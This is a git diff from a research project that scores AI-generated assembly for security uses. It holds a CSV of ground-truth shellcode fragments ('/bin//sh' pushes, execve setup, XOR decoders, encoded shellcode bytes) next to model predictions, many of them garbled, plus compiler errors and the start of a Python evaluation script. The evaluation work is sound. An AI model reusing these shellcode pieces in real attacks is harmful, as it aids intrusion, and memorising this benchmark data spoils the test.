[-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: symbol `my_table' not defined +";0 +push 0x706d742f;push 0x706d742f;Matched with ground truth;1 +mov ax, 1;mov ax, 1;Matched with ground truth;1 +mov al, 5;mov al, 5;Matched with ground truth;1 +scasd;cmp eax, dword [edi] \\n not dword [edi];No compiler errors;1 +ret;pop that;"assembly_instruction.asm:1: error: symbol `that' not defined +";0 +mov al, dl;mov al, dl;Matched with ground truth;1 +sub [var2], esi;sub var2, esi;"assembly_instruction.asm:1: error: symbol `var2' not defined +";0 +sub ecx, 23;sub ecx, 23;Matched with ground truth;1 +push edi \\n mov eax, esp;push edi \\n mov eax, esp;Matched with ground truth;1 +test eax, eax \\n jz write \\n xor eax, eax;test eax, eax \\n jz write;"assembly_instruction.asm:2: error: symbol `write' not defined +";1 +lea ebx, [edx+0x4];mov ebx, edx+0x4;"assembly_instruction.asm:1: error: invalid register set size +";0 +cmp [ebp+var_a], 0;cmp [ebp+var_a], 0;Matched with ground truth;1 +inc ebx \\n push ebx;push 1;No compiler errors;1 +word1 word 65535;word1: db 65535;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +";1 +sub cx, cx;sub cx, cx;Matched with ground truth;1 +mov ebx, 4;mov eax, 0x68732f2f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: byte data exceeds bounds [-w+number-overflow] +";1 +incpage:;incpage:;Matched with ground truth;1 +push word 0x632d \\n mov edi, esp;push word 0x632d \\n mov edi, esp;Matched with ground truth;1 +push ecx;push ecx;Matched with ground truth;1 +test eax, eax \\n js _while_loop;test eax, eax \\n jns _while_loop;"assembly_instruction.asm:2: error: symbol `_while_loop' not defined +";1 +mov ecx,esp;mov ecx, esp;Matched with ground truth;1 +cmp dword ptr [eax],edx \\n jne loop;edx: \\n dword ptr 0x68732f2f \\n dword ptr 0x68732f \\n dword ptr 0x6e69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x696;"assembly_instruction.asm:1: error: label or instruction expected at start of line +assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: label or instruction expected at start of line +assembly_instruction.asm:4: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +assembly_instruction.asm:6: error: label or instruction expected at start of line +assembly_instruction.asm:7: error: label or instruction expected at start of line +assembly_instruction.asm:8: error: label or instruction expected at start of line +assembly_instruction.asm:9: error: label or instruction expected at start of line +assembly_instruction.asm:10: error: label or instruction expected at start of line +assembly_instruction.asm:11: error: label or instruction expected at start of line +assembly_instruction.asm:12: error: label or instruction expected at start of line +";0 +jne encodedshellcode;jz _encodedshellcode;"assembly_instruction.asm:1: error: symbol `_encodedshellcode' not defined +";1 +me:;me:;Matched with ground truth;1 +push ebx;push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +";1 +cld;xor ecx, ecx \\n mul ecx;No compiler errors;1 +sub eax, ebx;sub eax, ebx;Matched with ground truth;1 +mov bl,0x3;push 0x3 \\n pop bl;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +";0 +cmp al, 0xf2 \\n jz _start;cmp al, 0xf2 \\n jge _start;"assembly_instruction.asm:2: error: symbol `_start' not defined +";1 +lea ecx, [esi + 8];lea ecx, [esi+8];Matched with ground truth;1 +xor ebx, ebx;xor ebx, ebx;Matched with ground truth;1 +mov ax, 1666;mov ax, 1666;Matched with ground truth;1 +mov ebx, esp;mov ebx, esp;Matched with ground truth;1 +push dword 0x61722f6c;push dword 0x61722f6c;Matched with ground truth;1 +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n jl 0xff \\n add dl, 0x5;No compiler errors;1 +loop l4 \\n mov edx, esp;loop l4 \\n mov edx, esp;Matched with ground truth;1 +mov cl, 4;mov cl, 4;Matched with ground truth;1 +loop decode \\n jmp Shellcode;loop decode \\n jmp Shellcode;Matched with ground truth;1 +xchg eax, ebx;xchg eax, ebx;Matched with ground truth;1 +cmp byte [esi], 0xD \\n jl wrap_around;cmp byte [esi], 0xD \\n jl wrap_around;Matched with ground truth;1 +mov byte [esi + 1], dl;mov [esi+1], dl;No compiler errors;1 +mov al, 0x3f;push 63 \\n pop 63;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +";0 +push 0xdebf;push 0xdebf;Matched with ground truth;1 +section .text;section;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +";1 +mov al, 15;mov byte [eax], 15;No compiler errors;1 +push eax;push edx;No compiler errors;1 +push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp;push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp;Matched with ground truth;1 +lea ecx, [esp];mov ecx, esp;No compiler errors;1 +push 0x69622f3a;push 0x69622f3a;Matched with ground truth;1 +push eax;push eax;Matched with ground truth;1 +mov eax, msg1;mov eax, msg1;Matched with ground truth;1 +lea ecx, [zero_reg+117];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ecx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +";1 +mov dword [esp-0x24], 0x732f636f;mov dword [0x732f636f], 0x732f636f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +";1 +push 0x6873732f \\n push 0x6374652f \\n mov edx, esp;push 0x6873732f \\n push 0x6374652f \\n mov edx, esp;Matched with ground truth;1 +inc esi;inc esi;Matched with ground truth;1 +mov esi, eax;mov esi, eax;Matched with ground truth;1 +shr ax, cl;cmp ax, cl;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +cmp eax, ebx;cmp ebx, eax;No compiler errors;1 +section .text \\n _start:;section .data, _start;"assembly_instruction.asm:1: warning: ignoring unknown section attribute: ""_start"" [-w+other] +";1 +dec byte dl;dec dl;No compiler errors;1 +jmp callpop;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +";1 +mov eax, 2;mov eax, 0x68732f2f \\n mov eax, 0x6e69622f;No compiler errors;1 +sub esp, 0x7f;sub 0x7f, 0x7f;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +push 0x706d742f;push 0x706d742f;Matched with ground truth;1 +xor byte [esi], 0x97;xor byte [esi], 0x97;Matched with ground truth;1 +mov al, 0x5;mov al, 0x68732f2f \\n mov al, 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +";1 +inc ebx;inc ebx;Matched with ground truth;1 +mul ebx;xor eax, eax;No compiler errors;1 +mov ax, 0x16b;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov ax, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +";0 +xor eax,eax \\n xor ebx,ebx;xor eax, eax \\n xor ebx, ebx;Matched with ground truth;1 +push 0x706d742f;push 0x706d742f;Matched with ground truth;1 +push word 0x1b6 \\n pop ecx;mov ecx, read-write;"assembly_instruction.asm:1: error: symbol `read' not defined +";0 +loop fill;loop ecx \\n xor var1, var1 \\n xor unless, unless \\n xor decrementing, decrementing;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: symbol `var1' not defined +assembly_instruction.asm:3: error: symbol `unless' not defined +assembly_instruction.asm:4: error: symbol `decrementing' not defined +";0 +push dword eax;push dword eax;Matched with ground truth;1 +shellcode:;shellcode:;Matched with ground truth;1 +neg eax;not eax;No compiler errors;1 +mov dword [esp-12], 0x6374652f;mov dword [[], 0x6374652f;"assembly_instruction.asm:1: error: expression syntax error +";0 +push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp;push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp;Matched with ground truth;1 +push 0x04020a0a;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +mul [var];mul 32-bit;"assembly_instruction.asm:1: error: symbol `bit' not defined +";0 +lea ebx, [ebp+39];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ebx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +";1 +mov rcx, 0x68732f2f6e69622f;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov rcx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +";0 +mov cx, 0x401;mov cx, 0x401;Matched with ground truth;1 +cmp bh, al;cmp bh, al;Matched with ground truth;1 +push 0x7665642f;push 0x7665642f;Matched with ground truth;1 +jmp short shellcode_section;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +";1 +ja write;jge write;"assembly_instruction.asm:1: error: symbol `write' not defined +";1 +mov ecx, 4294948047;mov ecx, 4294948047;Matched with ground truth;1 +mov al, 0x2e;push setgid \\n pop = \\n pop 0x2e;"assembly_instruction.asm:2: error: expression syntax error +";0 +mov ecx, esp;push trasnfer \\n pop ecx;"assembly_instruction.asm:1: error: symbol `trasnfer' not defined +";1 +jmp short stage;jmp short stage;Matched with ground truth;1 +je short loc_402b13;cmp loc_402b13, loc_402b13 \\n je loc_402b13;"assembly_instruction.asm:1: error: symbol `loc_402b13' not defined +assembly_instruction.asm:2: error: symbol `loc_402b13' not defined +";0 +pop ebx;push byte 0x68732f2f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov ebx, esp;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: signed byte value exceeds bounds [-w+number-overflow] +";1 +mov ecx, esp;pop ecx;No compiler errors;1 +mov eax, 0x50905090;push byte 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x5090509050905090 \\n push 0x5090;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +";1 +push byte 0x1 \\n pop edx;push byte 0x1 \\n pop edx;Matched with ground truth;1 +shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23;shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23;Matched with ground truth;1 +pop ecx;pop ecx;Matched with ground truth;1 +jmp nextchar;jmp code;"assembly_instruction.asm:1: error: symbol `code' not defined +";1 +jz download;jz download;Matched with ground truth;1 +push 0x3 \\n pop ebx;push sys_connect \\n pop = \\n pop ebx;"assembly_instruction.asm:2: error: expression syntax error +";0 +mov esi, esp;mov esi, esp;Matched with ground truth;1 +cmp eax,ebx \\n je exit;cmp eax, ebx \\n je _exit;"assembly_instruction.asm:2: error: symbol `_exit' not defined +";1 +push dword eax;push dword eax;Matched with ground truth;1 +add byte [esi], 0x02;add byte [esi], 0x02;Matched with ground truth;1 +mov [ebp+20], zero_reg;mov zero_reg, [[];"assembly_instruction.asm:1: error: expression syntax error +";0 +push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp;push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp;Matched with ground truth;1 +pop eax;pop eax;Matched with ground truth;1 +zero1b:;_zero1b:;No compiler errors;1 +mov eax, 65;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +";1 +jmp short formatting;jmp short formatting;Matched with ground truth;1 +xchg ebx,eax;xchg ebx, eax;Matched with ground truth;1 +jmp edi;jmp edi;Matched with ground truth;1 +xor edx, edx \\n mul edx;xor eax, eax \\n mul eax;No compiler errors;1 +xor ax, 0x539;xor ax, 0x539;Matched with ground truth;1 +sub eax, 8;sub eax, 8;Matched with ground truth;1 +push 0x61622f6e;push 0x61622f6e;Matched with ground truth;1 +push dx;push dx;Matched with ground truth;1 +mov ecx,esp;mov ecx, esp;Matched with ground truth;1 +notdecode:;notdecode:;Matched with ground truth;1 +jmp read;jmp read;Matched with ground truth;1 +push word 0x776f;push word 0x776f;Matched with ground truth;1 +push 0x68732f2f \\n push 0x68732f2f \\n push 0x2f656c2d;push ' -le///sh//sh';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +";1 +child:;child:;Matched with ground truth;1 +mov edx, response;mov edx, response;Matched with ground truth;1 +scasd \\n l1 IncAddr;cmp DWORD [eax], edi \\n jne l1;"assembly_instruction.asm:2: error: symbol `l1' not defined +";1 +mov esi, 0x353ffc3b;mov esi, 0x353ffc3b;Matched with ground truth;1 +_ip equ 0x0100007f;ip equ 0x0100007f;No compiler errors;1 +lea edx, [ebx+12];lea edx, [ebx+12];Matched with ground truth;1 +pop esi;mov esi, word [esi];"assembly_instruction.asm:1: error: mismatch in operand sizes +";0 +xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;Matched with ground truth;1 +add edx, 32;add edx, 32;Matched with ground truth;1 +xor eax, eax \\n mov ebx, eax \\n mov ecx, eax \\n mov edx, eax;xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;No compiler errors;1 +mov byte [esi + 1], dl;mov dl, byte [esi+1];No compiler errors;1 +push 0xb \\n pop eax;push __nr_execve \\n pop eax;"assembly_instruction.asm:1: error: symbol `__nr_execve' not defined +";1 +or eax, 0xffffffff \\n not eax \\n push eax;mov eax, value -1 \\n not eax;"assembly_instruction.asm:1: error: symbol `value' not defined +";1 +mov bl, 3 \\n dec bl \\n jnz l3;mov bl, 3 \\n dec bl \\n jnz l3;Matched with ground truth;1 +call decoder \\n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01;jmp shellcode;"assembly_instruction.asm:1: error: symbol `shellcode' not defined +";1 +mov al, 0x8;push byte 0x8 \\n pop 0x8;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +";0 +shr bl, 4;shr bl, 4;Matched with ground truth;1 +push 0x746f6f72;push 0x746f6f72;Matched with ground truth;1 +xor eax, eax \\n mov al, 6;xor eax, eax \\n mov numebr, esp;"assembly_instruction.asm:2: error: symbol `numebr' not defined +";0 +ja exi;jge exi;"assembly_instruction.asm:1: error: symbol `exi' not defined +";1 +mov ecx, 0x1;mov ecx, 0x1;Matched with ground truth;1 +mov eax, [ebx+esi*2+4];mov eax, [ebx+esi*2+4];Matched with ground truth;1 +_start: \\n jmp short call_shellcode;_start: \\n jmp short call_shellcode;Matched with ground truth;1 +mov edx, dword 0x65676760;mov edx, 0x65676760;No compiler errors;1 +xor ecx, ecx;xor ecx, ecx;Matched with ground truth;1 +sub eax, 3;dec eax;No compiler errors;1 +_file:;_file_label:;No compiler errors;1 +int 0x80;int 80h;No compiler errors;1 +push dword 0x3a303a3a;push dword 0x3a303a3a;Matched with ground truth;1 +cmp BYTE al, 2 \\n je do_inject;cmp al, 2 \\n jne do_inject;"assembly_instruction.asm:2: error: symbol `do_inject' not defined +";1 +movq mm3, qword [esi];mov mm3, \shellcode\;"assembly_instruction.asm:1: error: symbol `shellcode' not defined +";0 +je exit;jne exit;"assembly_instruction.asm:1: error: symbol `exit' not defined +";1 +mov byte [edi], bl;mov byte [edi], bl;Matched with ground truth;1 +xchg edi,eax;xchg edi, eax;Matched with ground truth;1 +push eax \\n mov edx,esp;"push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +";"assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 diff --git a/ACCA/README.md b/ACCA/README.md new file mode 100644 index 0000000000000000000000000000000000000000..13f4b31f450fd831c97316696db5ab7cca928276 --- /dev/null +++ b/ACCA/README.md @@ -0,0 +1,20 @@ +# Automating the Correctness Assessment of AI-generated Code for Security Contexts + +This repo contains **ACCA**, a fully automated method to evaluate the correctness of AI-generated code for security purposes. The method uses symbolic execution to assess whether the AI-generated assembly code behaves as a reference implementation. + +To correctly perform the evaluation, make sure to follow these steps: + +# Step 0: Ground Truth and Predictions Files Setup + +* Put the file containing your ground truth code snippets in the ``Ground Truth and Predictions/Ground Truth`` folder +* Put the file containing your predicted code snippets in the ``Ground Truth and Predictions/Predictions`` folder + +# Step 1: Syntactic Correctness Analysis + +* To perform the syntactic evaluation, run the command ``python syntactic_analisys.py``. The script opens up a window that lets you select the file to evaluate. +* The results of the syntactic analysis are both shown and stored in a .csv file in the ``Output/Output_Syntactic_Analysis`` folder. In the ``Filtered Snippets`` folder you can also find the results filtered by warnings, undefined symbol errors and other errors. + +# Step 2: Semantic Correctness Analysis + +* To perform the semantic evaluation, run the command ``python semantic_analisys.py``. The script opens up a window that lets you select the file to evaluate. Make sure to select the file containing the results of the previous syntactic analysis. +* The results of the semantic analysis are both shown and stored in a .csv file in the ``Output/Output_Semantic_Analysis`` folder. diff --git a/ACCA/semantic_analysis.py b/ACCA/semantic_analysis.py new file mode 100644 index 0000000000000000000000000000000000000000..c956499054745ba0b82ce546b025446a4db445e1 --- /dev/null +++ b/ACCA/semantic_analysis.py @@ -0,0 +1,944 @@ +import os +import pandas as pd +from pathlib import Path +import angr +import claripy +import collections +import shutil +from tqdm import tqdm +from tkinter import filedialog +import tkinter as tk + +def postProcessingSND(str_GT, str_PR, output_dir): + + changeScore = False + list_symbolsGT = [] + list_symbolsPR = [] + + #############################PER GT##################################### + list_snippetsGT_spllited_by_backslash = [] + list_snippetsGT_spllited_by_backslash = str_GT.split('\\n ') + + for j in range(len(list_snippetsGT_spllited_by_backslash)): + list_snippetsGT_spllited_by_backslash[j] = list_snippetsGT_spllited_by_backslash[j].replace('\\', '') + + #Creazione scrittura su un file di testo e conversione a .asm + + with open(output_dir + '/GT_PP.txt', 'w') as f: + + for z in range(len(list_snippetsGT_spllited_by_backslash)): + f.write(list_snippetsGT_spllited_by_backslash[z]) + f.write("\n") + + f.close() + + p = Path(output_dir + '/GT_PP.txt') + p.rename(p.with_suffix('.asm')) + + #Lancio del compilatore da shell (l'output è salvato in un file .txt temporaneo) + os.chdir(output_dir) + os.system("nasm -f bin GT_PP.asm -o GT_PP.obj 2>> tempFileGT_PP.txt") + + #Controllo se .asm fa riferimento ad un'architettura 64bit + if(os.stat("tempFileGT_PP.txt").st_size != 0): + + #Lettura del contenuto del file temporaneo e conversione in lista di output + + output_NASMcompiler = open(output_dir+"/tempFileGT_PP.txt", 'r') + list_output_NASMcompiler = output_NASMcompiler.readlines() + output_NASMcompiler.close() + + #Si itera sulla lista di output + + for k in range(len(list_output_NASMcompiler)): + + #Conversione in stringa del k-esimo output e conversione in lista splittando con ' ' + + str_output_NASMcompiler = str(list_output_NASMcompiler[k]) + list_splitted_output_NASMcompiler = str_output_NASMcompiler.split(' ') + + #Si verifica che non sia una warning o un simbolo non definito. + #In caso contrario, si setta la variabile di controllo a True + + if(list_splitted_output_NASMcompiler[2] == "symbol"): + if(list_splitted_output_NASMcompiler[4] == "not"): + if(list_splitted_output_NASMcompiler[5] == "defined\n"): + str_symbol = list_splitted_output_NASMcompiler[3] + str_symbol = str_symbol.replace("'","") + str_symbol = str_symbol[1:] + list_symbolsGT.append(str_symbol) + + ######################################################################## + + #############################PER PR##################################### + list_snippetsPR_spllited_by_backslash = [] + list_snippetsPR_spllited_by_backslash = str_PR.split('\\n ') + + for j in range(len(list_snippetsPR_spllited_by_backslash)): + list_snippetsPR_spllited_by_backslash[j] = list_snippetsPR_spllited_by_backslash[j].replace('\\', '') + + #Creazione scrittura su un file di testo e conversione a .asm + + with open(output_dir + '/PR_PP.txt', 'w') as f: + + for z in range(len(list_snippetsPR_spllited_by_backslash)): + f.write(list_snippetsPR_spllited_by_backslash[z]) + f.write("\n") + + f.close() + + p = Path(output_dir + '/PR_PP.txt') + p.rename(p.with_suffix('.asm')) + + #Lancio del compilatore da shell (l'output è salvato in un file .txt temporaneo) + os.chdir(output_dir) + os.system("nasm -f bin PR_PP.asm -o 